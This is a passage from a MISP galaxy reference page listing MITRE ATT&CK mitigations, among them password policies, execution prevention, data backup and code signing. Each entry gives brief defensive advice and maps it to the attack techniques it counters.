mitigates: misp-galaxy:mitre-attack-pattern="Sharepoint - T1213.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="ARP Cache Poisoning - T1557.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Phishing for Information - T1598" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Service - T1598.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1598.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Malicious Image - T1204.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Code Repositories - T1213.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Double File Extension - T1036.007" with estimative-language:likelihood-probability="almost-certain"

Table 4300. Table References
Links
https://attack.mitre.org/mitigations/M1017

Screensaver Mitigation - T1180

Block .scr files from being executed from non-standard locations. Set Group Policy to force users to have a dedicated screensaver where local changes should not override the settings to prevent changes. Use Group Policy to disable screensavers if they are unnecessary. (Citation: TechNet Screensaver GP)

The tag is: misp-galaxy:mitre-course-of-action="Screensaver Mitigation - T1180"

View relationships graph

Screensaver Mitigation - T1180 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Screensaver - T1180" with estimative-language:likelihood-probability="almost-certain"

Table 4301. Table References
Links
https://attack.mitre.org/mitigations/T1180
https://technet.microsoft.com/library/cc938799.aspx

Rundll32 Mitigation - T1085

Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass whitelisting. (Citation: Secure Host Baseline EMET)

The tag is: misp-galaxy:mitre-course-of-action="Rundll32 Mitigation - T1085"

View relationships graph

Rundll32 Mitigation - T1085 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Rundll32 - T1085" with estimative-language:likelihood-probability="almost-certain"

Table 4302. Table References
Links
https://attack.mitre.org/mitigations/T1085
https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET

Hypervisor Mitigation - T1062

Prevent adversary access to privileged accounts necessary to install a hypervisor.

The tag is: misp-galaxy:mitre-course-of-action="Hypervisor Mitigation - T1062"

View relationships graph

Hypervisor Mitigation - T1062 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Hypervisor - T1062" with estimative-language:likelihood-probability="almost-certain"

Table 4303. Table References
Links
https://attack.mitre.org/mitigations/T1062

DCShadow Mitigation - T1207

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of AD design features. For example, mitigating specific AD API calls will likely have unintended side effects, such as preventing DC replication from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior.

The tag is: misp-galaxy:mitre-course-of-action="DCShadow Mitigation - T1207"

View relationships graph

DCShadow Mitigation - T1207 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Rogue Domain Controller - T1207" with estimative-language:likelihood-probability="almost-certain"

Table 4304. Table References
Links
https://attack.mitre.org/mitigations/T1207

Password Policies - M1027

Set and enforce secure password policies for accounts.

The tag is: misp-galaxy:mitre-course-of-action="Password Policies - M1027"

View relationships graph

Password Policies - M1027 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows Admin Shares - T1077" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1184" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1075" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1097" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Forced Authentication - T1187" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Private Keys - T1145" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1208" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1503" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1214" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Keychain - T1142" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Transfer Data to Cloud Account - T1537" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Keychain - T1555.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credential Stuffing - T1110.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Proc Filesystem - T1003.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="/etc/passwd and /etc/shadow - T1003.008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1563.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Silver Ticket - T1558.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Steal or Forge Kerberos Tickets - T1558" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Default Accounts - T1078.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="AS-REP Roasting - T1558.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Boundary Bridging - T1599" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Address Translation Traversal - T1599.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify System Image - T1601" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Patch System Image - T1601.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Downgrade System Image - T1601.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005" with estimative-language:likelihood-probability="almost-certain"

Table 4305. Table References
Links
https://attack.mitre.org/mitigations/M1027

Kerberoasting Mitigation - T1208

Ensure strong password length (ideally 25+ characters) and complexity for service accounts and that these passwords periodically expire. (Citation: AdSecurity Cracking Kerberos Dec 2015) Also consider using Group Managed Service Accounts or another third party product such as password vaulting. (Citation: AdSecurity Cracking Kerberos Dec 2015)

Limit service accounts to minimal required privileges, including membership in privileged groups such as Domain Administrators. (Citation: AdSecurity Cracking Kerberos Dec 2015)

Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible. (Citation: AdSecurity Cracking Kerberos Dec 2015)

The tag is: misp-galaxy:mitre-course-of-action="Kerberoasting Mitigation - T1208"

View relationships graph

Kerberoasting Mitigation - T1208 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1208" with estimative-language:likelihood-probability="almost-certain"

Table 4306. Table References
Links
https://attack.mitre.org/mitigations/T1208
https://adsecurity.org/?p=2293

Data Backup - M1053

Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.

The tag is: misp-galaxy:mitre-course-of-action="Data Backup - M1053"

View relationships graph

Data Backup - M1053 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Defacement - T1491" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1488" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1487" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Internal Defacement - T1491.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="External Defacement - T1491.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disk Wipe - T1561" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1561.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002" with estimative-language:likelihood-probability="almost-certain"

Table 4307. Table References
Links
https://attack.mitre.org/mitigations/M1053

Masquerading Mitigation - T1036

When creating security rules, avoid exclusions based on file name or file path. Require signed binaries. Use file system access controls to protect folders such as C:\Windows\System32. Use tools that restrict program execution via whitelisting by attributes other than file name.

Identify potentially malicious software that may look like a legitimate program based on name and location, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Masquerading Mitigation - T1036"

View relationships graph

Masquerading Mitigation - T1036 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 4308. Table References
Links
https://attack.mitre.org/mitigations/T1036
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Execution Prevention - M1038

Block execution of code on a system through application control, and/or script blocking.

The tag is: misp-galaxy:mitre-course-of-action="Execution Prevention - M1038"

View relationships graph

Execution Prevention - M1038 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="CMSTP - T1191" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1223" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1198" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Signed Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1038" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Screensaver - T1180" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Path Interception - T1034" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Mshta - T1170" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1215" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="InstallUtil - T1118" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1144" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1015" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1182" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1103" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Control Panel Items - T1196" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1172" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1161" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1121" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Elevated Execution with Prompt - T1514" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Hidden Window - T1143" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="InstallUtil - T1218.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1218.009" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Control Panel - T1218.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Screensaver - T1546.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1546.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1546.009" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1546.010" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1547.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Elevated Execution with Prompt - T1548.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="PubPrn - T1216.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1553.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1553.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Path Interception by Unquoted Path - T1574.009" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Path Interception by PATH Environment Variable - T1574.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Path Interception by Search Order Hijacking - T1574.008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Linker Hijacking - T1574.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Subvert Trust Controls - T1553" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Signed Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="COR_PROFILER - T1574.012" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Run Virtual Instance - T1564.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Verclsid - T1218.012" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Device CLI - T1059.008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Mark-of-the-Web Bypass - T1553.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Container Administration Command - T1609" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Escape to Host - T1611" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="IIS Components - T1505.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="MSBuild - T1127.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Mavinject - T1218.013" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="MMC - T1218.014" with estimative-language:likelihood-probability="almost-certain"

Table 4309. Table References
Links
https://attack.mitre.org/mitigations/M1038

Software Configuration - M1054

Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.

The tag is: misp-galaxy:mitre-course-of-action="Software Configuration - M1054"

View relationships graph

Software Configuration - M1054 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1173" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1054" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1130" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1504" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Unused/Unsupported Cloud Regions - T1535" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Web Session Cookie - T1506" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Office Test - T1137.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1546.013" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Web Session Cookie - T1550.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Inter-Process Communication - T1559" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Subvert Trust Controls - T1553" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data from Configuration Repository - T1602" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SNMP (MIB Dump) - T1602.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Device Configuration Dump - T1602.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Forge Web Credentials - T1606" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Web Cookies - T1606.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Phishing for Information - T1598" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1598.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Safe Mode Boot - T1562.009" with estimative-language:likelihood-probability="almost-certain"

Table 4310. Table References
Links
https://attack.mitre.org/mitigations/M1054

Code Signing - M1045

Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.

The tag is: misp-galaxy:mitre-course-of-action="Code Signing - M1045"

View relationships graph

Code Signing - M1045 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="AppleScript - T1155" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Application Deployment Software - T1017" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1177" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LC_MAIN Hijacking - T1149" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1161" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Server Software Component - T1505" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="PowerShell - T1086" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1504" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Implant Internal Image - T1525" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Transport Agent - T1505.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SQL Stored Procedures - T1505.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1546.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1546.013" with estimative-language:likelihood-probability="almost-certain"
